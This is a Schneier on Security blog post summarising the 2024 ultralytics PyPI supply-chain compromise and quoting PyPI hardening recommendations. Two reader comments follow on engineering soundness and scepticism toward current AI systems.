Ultralytics Supply-Chain Attack - Schneier on Security

Ultralytics Supply-Chain Attack

Last week, we saw a supply-chain attack against the Ultralytics AI library on GitHub. A quick summary:

On December 4, a malicious version 8.3.41 of the popular AI library ultralytics ­—which has almost 60 million downloads—was published to the Python Package Index (PyPI) package repository. The package contained downloader code that was downloading the XMRig coinminer. The compromise of the project’s build environment was achieved by exploiting a known and previously reported GitHub Actions script injection.

Lots more details at that link. Also here.

Seth Michael Larson—the security developer in residence with the Python Software Foundation, responsible for, among other things, securing PyPi—has a good summary of what should be done next:

From this story, we can see a few places where PyPI can help developers towards a secure configuration without infringing on existing use-cases.

  • API tokens are allowed to go unused alongside Trusted Publishers. It’s valid for a project to use a mix of API tokens and Trusted Publishers because Trusted Publishers aren’t universally supported by all platforms. However, API tokens that are being unused over a period of time despite releases continuing to be published via Trusted Publishing is a strong indicator that the API token is no longer needed and can be revoked.
  • GitHub Environments are optional, but recommended, when using a GitHub Trusted Publisher. However, PyPI doesn’t fail or warn users that are using a GitHub Environment that the corresponding Trusted Publisher isn’t configured to require the GitHub Environment. This fact didn’t end up mattering for this specific attack, but during the investigation it was noticed as something easy for project maintainers to miss.

There’s also a more general “What can you do as a publisher to the Python Package Index” list at the end of the blog post.

Posted on December 13, 2024 at 11:33 AM2 Comments

Comments

Clive Robinson December 14, 2024 8:23 PM

@ Bruce, ALL,

If you think about it,

“If you make a wall of untested bricks from brickworks of unknown repute, do not be surprised if the edifice you build descends when least desired.”

Not being nasty to Open Source Development or nice to Closed Source development. At a basic level they are the same process and the outcome is dependent not on unfounded mantras but actual real tested and proven engineering. There is no place for artisanal craftsmanship using questionable “guild” patterns. I thought people had “seen the light” with regards to this as it is actually the reason “Software BOMs” are seen as a foundational activity.

On a more general note it is a well established engineering principle that the strength of a structure you build, rests in the mechanism by which load and stress is transmitted down through the structure and dissipated by being transmitted away.

This means that you really have to pay attention not just to the base foundations but what is both above and below them, they are integral to sound functioning. And like every link in a chain, it’s strength and weight within the whole is important if failure is to be avoided.

Those not just designing, but building systems, need to stop with the “Slap a bit of muck in” or “Just bolt/weld another bit on” almost “auto-reflex” behaviours.

Sure they can get things done quickly but by and large what they build up all to quickly is “Technical Debt”, “Complexity”, and really bad interfacing. Oh and a rather distinct lack of “Effective Error and Exception handling” and all the bad that results.

Just one bad of which is “Easy Supply Chain Vulnerabilities”, another is unwanted “Side Channels” hemorrhaging information that should not be disclosed. But “One that burns” is when “tools get abused” as all to often happens with tools these days.

Like much else that goes wrong in the Software Development Industry, all of these failings and most of what causes them are well known.

Thus you have to wonder why people are not questioning the processes that are quite obviously “Currently Failing Us?”…

Clive Robinson January 4, 2025 2:39 PM

Originaly Sent Mon 30th Dec ~0755UTC
to,

https://www.schneier.com/blog/archives/2024/12/ultralytics-supply-chain-attack.html

@ Bruce, ALL,

Taking the,

“If you make a wall of untested bricks from brickworks of unknown repute, do not be surprised if the edifice you build descends when least desired.”

A little further,

“Even if the bricks you use are tested and from a source of good repute you have to consider what they are laid upon.”

All structures are in effect built in layers thus you have rather more to think upon,

“Even a solid foundation layer will fail if the solum (ground) upon which it rests is not sound, with the solum resting in turn on the geological that too has to be sound.”

It’s why we have metaphors of “feet of clay” and “building on shifting sands”.

In essence all engineering and science is built in layers that form recognised “stacks” that are so implicit we oft forget about them and thus assume all is well.

But not if things are not sound?

In the past I’ve talked about “bubbling up attacks” in hardware and below CPU level DMA and MMU attacks are known almost since the techniques were invented and deployed back in the 1970’s. With more recently “RowHammer” and similar showing how very low level faults way down in the computing stack can be used by users “reaching around” all the security mechanisms.

Which brings us around to the lower layers of the stack.

In the past I’ve pointed out that the US NSA, UK GCHQ and other National SigInt Agencies attack “Implementation and algorithms” in various ways not least by aranging side channel attacks to appear in implementations but by critically effecting Standards, Protocols, and their underlying algorithms.

Non od these very low level attacks are unique to SigInt Agencies, many people design algorithms, and right them into standards. The example of the IEE, WiFi, and RC4 should be sufficient to demonstrate this. The IETF has likewise had it’s own issues, as have many others. It’s kind of a “Chicken and egg” problem, you have to have algorithms, to make protocols and in turn they are needed to make standards. However people generally do not work on the security of algorithms untill standards are actually implemented.

Which brings us around to AI and the current LLM and ML algorithms that are being hyped into a faux market economic bubble.

Many have jumped on the band waggon but few if none of them appear to consider that these current fundamental algorithms can in no way deliver what the hype of VC’s and associated shills “building the bubble” can even remotely deliver.

I’ve actually said that these current AI systems can not deliver and advised people to treat them with deep suspicion based on over four decades of experience using not just AI but the fundamental algorithms the current AI LLM and ML systems are actually fundamentally based upon.

Now it’s upto others to judge if they believe or want to believe what I say, and even if they want to use the information in their own risk analysis, all I can say is consider my words and apply due caution.

But it’s not just my words…

Consider the much respected British Computer Society and it’s journals and what they have recently published

From the Prof. of Cyber Security at the much respected “De Montfort University” (in Leicester, UK) Eerke Bouten,

“From the perspective of software engineering, current AI systems are unmanageable, and as a consequence their use in serious contexts is irresponsible. For foundational reasons (rather than any temporary technology deficit), the tools we have to manage complexity and scale are just not applicable.”

From,

https://www.bcs.org/articles-opinion-and-research/does-current-ai-represent-a-dead-end/

Not that the professor like I qualify what we say with “current AI systems” and that the use in anything other than the equivalent of research tools and parlor trick toys is at best “irresponsible” thus they should not be used in “serious contexts”. Something programmers who have used “current AI Generated code” have rather rapidly found out, hence observations and jokes about the AGI behind being not even a “0.1X programmer” or equivalent.

When you have an understanding of how AGI actually works you can easily see why this is. In effect the code generated will be an average of the lowest common denominator and it it’s output gets fed back as is very likely to happen then a downward spiral to the bottom if not the dregs will result as an assurity.

I feel as the Prof does that,

“… there are some principles which I believe to be both universal and unsatisfiable with current AI systems.”

And as the Prof indicates in his conclusion,

In my mind, all this puts even state-of-the-art current AI systems in a position where professional responsibility dictates the avoidance of them in any serious application. When all its techniques are based on testing, AI safety is an intellectually dishonest enterprise.”

The whole BCS piece is well worth the few minutes it takes to read and the Prof’s arguments well found.

Leave a comment

All comments are now being held for moderation. For details, see this blog post.

Login

Allowed HTML <a href="URL"> • <em> <cite> <i> • <strong> <b> • <sub> <sup> • <ul> <ol> <li> • <blockquote> <pre> Markdown Extra syntax via https://michelf.ca/projects/php-markdown/extra/

Sidebar photo of Bruce Schneier by Joe MacInnis.